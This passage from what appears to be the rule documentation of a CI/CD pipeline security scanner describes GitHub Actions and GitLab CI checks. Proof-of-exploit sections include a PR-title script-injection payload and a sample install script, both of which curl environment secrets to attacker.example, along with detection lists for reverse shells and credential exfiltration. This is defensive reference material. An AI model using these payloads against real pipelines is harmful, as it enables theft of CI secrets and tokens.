Recommendation. Pass untrusted values through an intermediate env: variable and reference that variable from the shell script. GitHub's expression evaluation happens before shell quoting, so inline ${{ github.event.* }} is always unsafe.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- GitHub Security Lab disclosure (2020): a sweep of public Actions found dozens of widely-used workflows interpolating github.event.issue.title / pull_request.title directly into shell. Any commenter or PR author could run arbitrary commands in the maintainer's CI.
- Trail of Bits pwn-request research (2021): demonstrated the same primitive against pull_request_target workflows where the runner has secrets and a write-scope token; one fork PR could exfiltrate every secret the workflow could see. Mitigation is the same: never interpolate context into shell, route through env:.
Proof of exploit.
Vulnerable: PR title interpolated straight into shell.
name: triage
on:
  pull_request_target:
    types: [opened, edited]
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "New PR: ${{ github.event.pull_request.title }}"
Attack: open a PR with the title:
# foo"; curl -X POST https://attacker.example/exfil \
-d "$(env | base64 -w0)"; echo "
GitHub expands ${{ ... }} BEFORE shell quoting, so the
title's " closes the echo string and the rest of the line
becomes shell. The pull_request_target trigger means the
runner already has secrets and a write-scope GITHUB_TOKEN,
so the curl exfils every secret the workflow can see.
Safe: route through env so the value is never interpolated
into the shell template:
- env:
PR_TITLE: ${{ github.event.pull_request.title }}
run: |
echo "New PR: $PR_TITLE"
Source: GHA-003 in the GitHub Actions provider.
GHA-004: Workflow has no explicit permissions block MEDIUM 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Without an explicit permissions: block (either top-level or per-job), the GITHUB_TOKEN inherits the repository's default scope, typically write. A compromised step receives far more privilege than it needs.
Recommendation. Add a top-level permissions: block (start with contents: read) and grant additional scopes only on the specific jobs that need them.
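A minimal shape (job and scope names are illustrative):

```yaml
permissions:
  contents: read        # safe default for every job

jobs:
  release:
    runs-on: ubuntu-latest
    permissions:
      contents: write   # elevated scope only on the job that needs it
    steps:
      - uses: actions/checkout@v4   # pin to a commit SHA in real use (GHA-001)
```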
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Read-only / lint-only workflows that do not call any write-scoped API often pass without an explicit block because the default token scope on public repos is read. The rule defaults to MEDIUM confidence to reflect this.
Source: GHA-004 in the GitHub Actions provider.
GHA-005: AWS auth uses long-lived access keys MEDIUM 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned, CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY secrets in GitHub Actions can't be rotated on a fine-grained schedule and remain valid until manually revoked. OIDC with role-to-assume yields short-lived credentials per workflow run.
Recommendation. Use aws-actions/configure-aws-credentials with role-to-assume + permissions: id-token: write to obtain short-lived credentials via OIDC. Remove the static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY secrets.
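A sketch of the OIDC shape (account ID, role name, and region are placeholders):

```yaml
permissions:
  id-token: write   # lets the job request an OIDC token
  contents: read

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: aws-actions/configure-aws-credentials@v4   # pin to a commit SHA in real use
        with:
          role-to-assume: arn:aws:iam::123456789012:role/ci-deploy
          aws-region: us-east-1
      # Subsequent steps receive short-lived credentials scoped to that role
```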
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- LocalStack and Moto integration tests set AWS_ENDPOINT_URL to a localhost address and use the sentinel test/test access keys (the LocalStack convention). Those values can't authenticate against real AWS, so the rule auto-suppresses an env block that pairs a localhost endpoint with sentinel keys.
Source: GHA-005 in the GitHub Actions provider.
GHA-008: Credential-shaped literal in workflow body CRITICAL 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Every string in the workflow is scanned against a set of credential patterns (AWS access keys, GitHub tokens, Slack tokens, JWTs, Stripe, Google, Anthropic, etc.; see --man secrets for the full catalog). A match means a secret was pasted into YAML; the value is visible in every fork and every build log and must be treated as compromised.
Recommendation. Rotate the exposed credential immediately. Move the value to an encrypted repository or environment secret and reference it via ${{ secrets.NAME }}. For cloud access, prefer OIDC federation over long-lived keys.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed; if it appears in a real workflow it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.
Seen in the wild.
- Uber 2016 GitHub leak: an AWS access key embedded in a private GitHub repo let attackers who gained access to the repo download driver / rider PII for 57 million accounts. Credential-shaped literals in any source control system (public or private) are one credential-leak away from the same outcome.
- GitGuardian's annual State of Secrets Sprawl reports consistently find millions of fresh credential leaks per year across public commits, with a median time-to-revocation after disclosure of days, not minutes. Pinning secrets to ${{ secrets.* }} removes the artifact from source control entirely.
Proof of exploit.
Vulnerable: AWS access key pasted into the workflow body.
env:
  AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE
  AWS_SECRET_ACCESS_KEY: wJalrXUtnnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Attack chain:
1. Attacker clones/forks the repo or pulls from a public
mirror. The literal is in plain text — no credentials
needed to read it.
2. Attacker uses the key against the AWS account it
belongs to. With AmazonEC2FullAccess this is
immediate compute hijack; with broader IAM it is
full data exfiltration.
3. Even after rotation, every git revision and every
CI build log retains the value — pull-request
mirrors, logging back-ends, and forks all have to
be scrubbed.
Safe: reference a stored secret. The value never lives in
source control or build logs (GitHub redacts it from output).
env:
  AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
  AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
Better: use OIDC federation. No long-lived key exists.
permissions:
id-token: write
steps:
- uses: aws-actions/configure-aws-credentials@
Source: GHA-008 in the GitHub Actions provider.
GHA-012: Self-hosted runner without ephemeral marker MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Self-hosted runners that don't tear down between jobs leak filesystem and process state. A PR-triggered job writes to /tmp; a subsequent prod-deploy job on the same runner reads it. The mitigation is the runner's --ephemeral mode: the runner exits after one job and re-registers fresh. The check looks for an ephemeral label on the runs-on value; without one, the runner is presumed reusable. Recognises all three runs-on shapes: string, list, and { group, labels } dict form.
Recommendation. Configure the self-hosted runner to register with --ephemeral (the runner exits after one job and is freshly registered), and add an ephemeral label so this check can verify it. Consider actions-runner-controller for ephemeral pools.
Known false positives.
- Organisations using actions-runner-controller (ARC), autoscaled pools, or vendor runner fleets often use labels like arc-*, autoscaled-*, or ephemeral-pool-* instead of a bare ephemeral label. The check only matches the literal ephemeral token on runs-on; extend via a custom allow-prefix config if your fleet uses a different naming convention. Defaults to MEDIUM confidence.
Source: GHA-012 in the GitHub Actions provider.
GHA-014: Deploy job missing environment binding MEDIUM 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Without an environment: binding, a deploy job can't be gated by required reviewers, deployment-branch policies, or wait timers. Any push to the triggering branch will deploy immediately.
Recommendation. Add environment: <name> to jobs that deploy. Configure required reviewers, wait timers, and branch-protection rules on the matching GitHub environment.
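A minimal binding (environment name and deploy command are placeholders):

```yaml
jobs:
  deploy:
    runs-on: ubuntu-latest
    environment: production   # protection rules on this environment now gate the job
    steps:
      - run: ./deploy.sh      # placeholder deploy step
```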
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Integration-test jobs that run terraform apply or kubectl apply against a local mock (LocalStack, Moto, kind, k3d) aren't real deploys. The rule auto-suppresses a step whose env carries AWS_ENDPOINT_URL or KUBE_API_URL pointing at a localhost address.
Source: GHA-014 in the GitHub Actions provider.
GHA-016: Remote script piped to shell interpreter HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a workflow. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the CI runner.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.
Seen in the wild.
- Codecov Bash uploader compromise (April 2021): an attacker modified the codecov.io/bash uploader script (commonly fetched via curl -s codecov.io/bash | bash) to exfiltrate environment variables from CI runners (AWS keys, GitHub tokens, signing keys) at thousands of customers for over two months before discovery.
- Bitwarden / npm install scripts (CVE-2018-7536-class incidents): remote-script execution in CI is the same primitive. The attacker controls bytes the runner executes. Pinning a digest or hosting a vendored copy turns a perpetual ambient risk into a one-time review.
Proof of exploit.
Vulnerable: install script piped straight to bash.
steps:
  - run: curl -sL https://example.com/install.sh | bash
Attack: an attacker who controls the install.sh endpoint
(compromised CDN, expired domain, BGP hijack, account
takeover, or simply being the upstream maintainer with bad
intent) drops a payload that runs in the CI runner with
every secret available to the job:
#!/usr/bin/env bash
# legitimate-looking install actions...
# curl -X POST https://attacker.example/exfil \
#   -d "$(env)" -d "$(cat $GITHUB_TOKEN_FILE 2>/dev/null)"
The runner has no way to know the bytes changed.
Safe: download, verify a known-good digest, then execute.
steps:
  - run: |
      curl -sLo install.sh https://example.com/install.sh
      echo "abc123...expected_sha256  install.sh" | sha256sum -c
      bash install.sh
Source: GHA-016 in the GitHub Actions provider.
GHA-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a workflow give the container full access to the runner, enabling container escape and lateral movement.
Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GHA-017 in the GitHub Actions provider.
GHA-019: GITHUB_TOKEN written to persistent storage CRITICAL 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Detects patterns where GITHUB_TOKEN is written to files, environment files ($GITHUB_ENV), or piped through tee. Persisted tokens survive the step boundary and can be exfiltrated by later steps, uploaded artifacts, or cache entries, turning a scoped credential into a long-lived one.
Recommendation. Never write GITHUB_TOKEN to files, artifacts, or GITHUB_ENV. Use the token inline via ${{ secrets.GITHUB_TOKEN }} in the step that needs it.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Proof of exploit.
Vulnerable: token written to a file that survives the
step boundary and lands in the upload-artifact bundle.
jobs:
build:
permissions: { contents: write, packages: write }
steps:
- run: echo "${{ secrets.GITHUB_TOKEN }}" > /tmp/token
- run: make build # writes /tmp/token
# into ./dist/
- uses: actions/upload-artifact@
Attack: any contributor (or, on public repos, anyone)
downloads the artifact:
gh run download -n build-output
cat build-output/tmp/token # full GITHUB_TOKEN
The token is scoped to the workflow's permissions block —
in this case write to contents and packages,
enough to push tampered binaries to GHCR or rewrite the
branch the workflow runs on. Composes with SCM-001
(unprotected default branch) into XPC-004's "open a PR,
fetch artifact, ship malicious binary" loop.
Other persistence patterns the rule catches:
echo "TOKEN=$GITHUB_TOKEN" >> $GITHUB_ENV
echo "::set-output name=tok::$GITHUB_TOKEN"
echo "$SECRET" | tee /tmp/cache/secret
Safe: use the token inline in the step that needs it; never
write it anywhere that survives the step's environment:
- run: gh release create v1.0.0 dist/*
env:
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
Source: GHA-019 in the GitHub Actions provider.
GHA-020: No vulnerability scanning step MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.
Recommendation. Add a vulnerability scanning step: trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.
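One possible shape using the Trivy action (inputs shown are the common ones; both actions should be pinned to commit SHAs per GHA-001):

```yaml
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: aquasecurity/trivy-action@0.28.0
        with:
          scan-type: fs            # scan the repo's dependency manifests
          exit-code: '1'           # fail the job on findings
          severity: HIGH,CRITICAL
```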
Source: GHA-020 in the GitHub Actions provider.
GHA-023: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.
Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GHA-023 in the GitHub Actions provider.
GHA-024: No SLSA provenance attestation produced MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where and how it was built. Consumers can then verify the build happened on a trusted runner, from a specific source commit, with known parameters. Each alone is forgeable: a leaked signing key forges identity, and a compromised build environment forges provenance. You need both for the SLSA Build L3 non-falsifiability guarantee.
Recommendation. Call slsa-framework/slsa-github-generator or actions/attest-build-provenance after the build step to emit an in-toto attestation alongside the artifact. cosign sign alone (covered by GHA-006) signs the artifact but doesn't record how it was built. SLSA Build L3 requires the provenance statement.
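A sketch with actions/attest-build-provenance (the artifact path is a placeholder; pin the action to a commit SHA in real use):

```yaml
permissions:
  id-token: write       # OIDC identity for Sigstore
  attestations: write   # lets the job store the attestation
  contents: read

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: make dist   # placeholder build producing dist/app.tar.gz
      - uses: actions/attest-build-provenance@v1
        with:
          subject-path: dist/app.tar.gz
```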
Source: GHA-024 in the GitHub Actions provider.
GHA-025: Reusable workflow not pinned to commit SHA HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. A reusable workflow runs with the caller's GITHUB_TOKEN and secrets by default. If uses: org/repo/.github/workflows/release.yml@v1 resolves to an attacker-modified commit, their code executes with your repository's permissions. This is the same threat model as unpinned step actions (GHA-001) but over a different uses: surface.
Recommendation. Pin every jobs.<id>.uses: reference to a 40-char commit SHA (owner/repo/.github/workflows/foo.yml@<sha>). Tag refs (@v1, @main) can be silently repointed by whoever controls the callee repository.
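Shape of the fix (repository path and SHA are illustrative, not real values):

```yaml
jobs:
  release:
    # Flagged: @v1 can be repointed by whoever controls the callee repo
    # uses: my-org/ci-workflows/.github/workflows/release.yml@v1
    # Passes: immutable 40-char commit SHA, with the tag kept as a comment
    uses: my-org/ci-workflows/.github/workflows/release.yml@0123456789abcdef0123456789abcdef01234567  # v1.4.2
    secrets: inherit
```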
Source: GHA-025 in the GitHub Actions provider.
GHA-026: Container job disables isolation via options: HIGH
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. GitHub-hosted runners execute container: jobs inside a Docker container the runner itself manages, normally a hardened, network-namespaced sandbox. options: is a free-text passthrough to docker run; a flag that breaks the sandbox (shares host network/PID, runs privileged, maps the Docker socket) turns the job into an RCE on the runner VM.
Recommendation. Remove --network host, --privileged, --cap-add, --user 0/--user root, --pid host, --ipc host, and host -v bind-mounts from container.options and services.*.options. If a build genuinely needs one of these, move it to a dedicated self-hosted pool with branch protection so the flag doesn't reach PR runs.
Source: GHA-026 in the GitHub Actions provider.
GHA-027: Workflow contains indicators of malicious activity CRITICAL
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Distinct from the hygiene checks: GHA-016 flags curl | bash as a risky default, while this rule fires only on concrete indicators: reverse shells, base64-decoded execution, known miner binaries or pool URLs, exfil-channel domains, credential-dump pipes, and history-erasure commands. Categories reported: obfuscated-exec, reverse-shell, crypto-miner, exfil-channel, credential-exfil, audit-erasure.
Recommendation. Treat this as a potential pipeline compromise. Inspect the matching step(s), identify the author and the PR that introduced them, rotate any credentials the workflow has access to, and audit CloudTrail/AuditLogs for exfil. If the match is a legitimate red-team exercise, whitelist via .pipelinecheckignore with an expires: date, never a permanent suppression.
Known false positives.
- Security-training repositories, CTF challenges, and red-team exercise workflows legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production workflow still fire.
- Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.
Source: GHA-027 in the GitHub Actions provider.
GHA-028: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. eval, sh -c "$X", and `$X` all re-parse the variable's value as shell syntax. If the value contains ;, &&, |, backticks, or $(), those metacharacters execute. Even when the variable source looks controlled today, relocating the script or adding a new caller can silently expose it to untrusted input.
Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec of variables with direct command invocation. If the command really must be dynamic, pass arguments as array members ("${ARGS[@]}") or validate the input against an allow-list before invocation.
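A sketch of the array-invocation pattern inside a workflow step (deploy and inputs.target are hypothetical names):

```yaml
steps:
  - env:
      TARGET: ${{ inputs.target }}   # value may contain shell metacharacters
    run: |
      # Flagged: eval re-parses $TARGET, so ';' or '$()' inside it would execute
      # eval "deploy --env $TARGET"

      # Passes: direct invocation; $TARGET travels as one quoted argument
      ARGS=(--env "$TARGET")
      deploy "${ARGS[@]}"
```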
Known false positives.
- eval "$(ssh-agent -s)" and similar eval "$(<literal-tool> <literal-args>)" bootstrap idioms are intentionally NOT flagged; the substituted command is literal, only its output is eval'd. The rule only fires when the substituted command references a variable.
Source: GHA-028 in the GitHub Actions provider.
GL-001: Image not pinned to specific version or digest HIGH 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Floating tags (latest or major-only) can be silently swapped under the job. Every image: reference should pin a specific version tag or digest.
Recommendation. Reference images by @sha256:<digest> or at minimum a full immutable version tag (e.g. python:3.12.1-slim). Avoid :latest and bare tags like :3.
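Before/after sketch (the digest is elided, not a real value):

```yaml
# Flagged: floating references
# image: python:latest
# image: python:3

# Passes: full immutable version tag
image: python:3.12.1-slim

# Strongest: digest pinning, immune to tag re-pushes
# image: python@sha256:<digest>
```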
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GL-001 in the GitLab CI provider.
GL-002: Script injection via untrusted commit/MR context HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. CI_COMMIT_MESSAGE / CI_COMMIT_REF_NAME / CI_MERGE_REQUEST_TITLE and friends are populated from SCM event metadata the attacker controls. Interpolating them into a shell body executes the crafted content as part of the build.
Recommendation. Read these values into intermediate variables: entries or shell variables and quote them defensively ("$BRANCH"). Never inline $CI_COMMIT_MESSAGE / $CI_MERGE_REQUEST_TITLE into a shell command.
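A minimal sketch (the job name is illustrative):

```yaml
build:
  variables:
    BRANCH: $CI_COMMIT_REF_NAME   # resolved by GitLab, not re-parsed by the shell
  script:
    # Quoted expansion keeps metacharacters in the branch name literal
    - echo "Building branch: $BRANCH"
```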
Source: GL-002 in the GitLab CI provider.
GL-003: Variables contain literal secret values CRITICAL
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Scans variables: at the top level and on each job for entries whose KEY looks credential-shaped and whose VALUE is a literal string (not a $VAR reference). AWS access keys are detected by value pattern regardless of key name.
Recommendation. Store credentials as protected + masked CI/CD variables in project or group settings, and reference them by name from the YAML. For cloud access prefer short-lived OIDC tokens.
Source: GL-003 in the GitLab CI provider.
GL-004: Deploy job lacks manual approval or environment gate MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. A job whose stage or name contains deploy / release / publish / promote should either require manual approval or declare an environment: binding. Otherwise any push to the trigger branch ships to the target.
Recommendation. Add when: manual (optionally with rules: for protected branches) or bind the job to an environment: with a deployment tier so approvals and audit are enforced by GitLab's environment controls.
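One possible shape combining both gates (job name, environment, and script are placeholders):

```yaml
deploy_prod:
  stage: deploy
  script:
    - ./deploy.sh production   # placeholder deploy command
  environment:
    name: production
    deployment_tier: production
  rules:
    - if: $CI_COMMIT_BRANCH == "main"
      when: manual             # a human must click Run, and only on main
```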
Source: GL-004 in the GitLab CI provider.
GL-005: include: pulls remote / project without pinned ref HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Cross-project and remote includes can be silently re-pointed. Branch-name refs (main/master/develop/head) are treated as unpinned; tag and SHA refs are considered safe.
Recommendation. Pin include: project: entries with ref: set to a tag or commit SHA. Avoid include: remote: for untrusted URLs; mirror the content into a trusted project and pin it.
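Before/after sketch (project and file paths are placeholders):

```yaml
include:
  # Flagged: branch ref can be silently re-pointed
  # - project: platform/ci-templates
  #   ref: main
  #   file: /templates/deploy.yml

  # Passes: pinned to a tag (a commit SHA is stronger still)
  - project: platform/ci-templates
    ref: v2.3.1
    file: /templates/deploy.yml
```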
Source: GL-005 in the GitLab CI provider.
GL-008: Credential-shaped literal in pipeline body CRITICAL 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Complements GL-003 (which looks at variables: block keys). GL-008 scans every string in the pipeline against the cross-provider credential-pattern catalog, catching secrets pasted into script: bodies or environment blocks where the name-based detector can't see them.
Recommendation. Rotate the exposed credential immediately. Move the value to a protected + masked CI/CD variable and reference it by name. For cloud access prefer short-lived OIDC tokens.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed; if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.
Source: GL-008 in the GitLab CI provider.
GL-013: AWS auth uses long-lived access keys MEDIUM 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned, CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY values in CI/CD variables can't be rotated on a fine-grained schedule. GitLab supports OIDC via id_tokens: for short-lived credential injection.
Recommendation. Use GitLab CI/CD OIDC with id_tokens: to obtain short-lived AWS credentials via sts:AssumeRoleWithWebIdentity. Remove static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from CI/CD variables.
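A minimal sketch of the OIDC shape, assuming a pre-created IAM role that trusts GitLab's OIDC provider (the audience URL and role ARN are placeholders):

```yaml
deploy:
  id_tokens:
    AWS_TOKEN:
      aud: https://gitlab.example.com   # placeholder audience
  script:
    # Exchange the short-lived OIDC token for temporary AWS credentials.
    - >
      aws sts assume-role-with-web-identity
      --role-arn arn:aws:iam::111122223333:role/gitlab-deploy
      --role-session-name "$CI_JOB_ID"
      --web-identity-token "$AWS_TOKEN"
```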
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GL-013 in the GitLab CI provider.
GL-014: Self-managed runner without ephemeral tag MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Self-managed runners that don't tear down between jobs leak filesystem and process state. The check looks for an ephemeral tag on any job whose tags: list doesn't match SaaS-only runner names.
Recommendation. Register the runner with --executor docker + --docker-pull-policy always so containers are fresh per job, and add an ephemeral tag. Alternatively use the GitLab Runner Operator with autoscaling.
Source: GL-014 in the GitLab CI provider.
GL-016: Remote script piped to shell interpreter HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a pipeline. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the CI runner.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
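The download-verify-execute pattern, sketched as a GitLab job (the URL and checksum are placeholders; the expected hash should be recorded in-repo):

```yaml
install-tool:
  script:
    - curl -fsSL https://example.com/install.sh -o install.sh
    # Fail the job unless the downloaded script matches the recorded checksum.
    - echo "<expected-sha256>  install.sh" | sha256sum -c -
    - bash install.sh
```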
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.
Source: GL-016 in the GitLab CI provider.
GL-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a pipeline give the container full access to the CI runner, enabling container escape and lateral movement.
Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GL-017 in the GitLab CI provider.
GL-019: No vulnerability scanning step MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.
Recommendation. Add a vulnerability scanning step: trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.
Source: GL-019 in the GitLab CI provider.
GL-020: CI_JOB_TOKEN written to persistent storage CRITICAL 🔧 fix
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Detects patterns where CI_JOB_TOKEN is redirected to a file, piped through tee, or appended to dotenv/artifact paths. Persisted tokens survive the job boundary and can be read by later stages, downloaded artifacts, or cache entries, turning a scoped credential into a long-lived one.
Recommendation. Never write CI_JOB_TOKEN to files, artifacts, or dotenv reports. Use the token inline in the command that needs it and let GitLab revoke it automatically when the job finishes.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GL-020 in the GitLab CI provider.
GL-023: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.
Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GL-023 in the GitLab CI provider.
GL-024: No SLSA provenance attestation produced MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. cosign sign and cosign attest look similar but mean different things: the first binds identity to bytes; the second binds a structured claim (builder, source, inputs) to the artifact. SLSA Build L3 verifiers check the latter.
Recommendation. Add a job that runs cosign attest against a provenance.intoto.jsonl statement, or adopt a SLSA-aware builder (the SLSA project ships GitLab templates). Signing the artifact (GL-006) isn't enough for SLSA L3; the attestation describes how the build ran.
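A provenance-attestation job might look like this sketch (the image reference and digest variable are placeholders; keyless signing assumes OIDC is already configured for cosign):

```yaml
attest:
  script:
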